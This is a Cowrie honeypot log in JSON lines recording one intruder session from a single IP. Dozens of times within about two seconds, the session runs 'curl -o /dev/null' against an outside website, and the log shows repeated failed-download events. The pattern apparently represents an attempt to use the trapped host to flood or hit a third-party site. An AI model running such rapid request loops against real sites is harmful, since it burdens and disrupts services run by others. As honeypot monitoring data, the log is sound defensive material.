{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.955095Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:09.971883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:09.972787Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.011281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.012296Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.055367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.056321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.093771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.094775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.097453Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.135533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.136560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.140445Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.174608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.175674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.213236Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.215002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.265609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.266745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.268247Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.307989Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.309007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.310241Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.349275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.350331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.355534Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.400700Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.401738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.438428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.439900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.472870Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.476803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.477751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.510952Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.515653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.516499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.555245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.556868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.594313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.595381Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.629796Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.632724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.633563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.664802Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.671299Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.672270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.703061Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.708920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.709826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.746906Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.748018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.754223Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.794258Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.796419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.797298Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.835136Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.836193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.873331Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.876682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.877733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.915528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.916561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.950415Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.953577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.954744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.988240Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:10.993271Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:10.994334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.027745Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.031485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.032420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.074760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.075890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.105268Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.112974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.114013Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.155603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.156519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.159611Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.192683Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.203669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.204652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.232423Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.242077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.243317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.273742Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.280219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.281210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.314589Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.320342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.321280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.354904Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.358142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.359253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.396754Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.398696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.400341Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.436177Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.440281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.441291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.477238Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.479313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.480110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.516936Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.519193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.520208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.557579Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.558783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.605679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.607249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.618063Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.644692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.645737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.683193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.684455Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.706215Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.724494Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.725664Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.744032Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.755188Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.757876Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.759618Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.761986Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:11.764769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:11.765676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
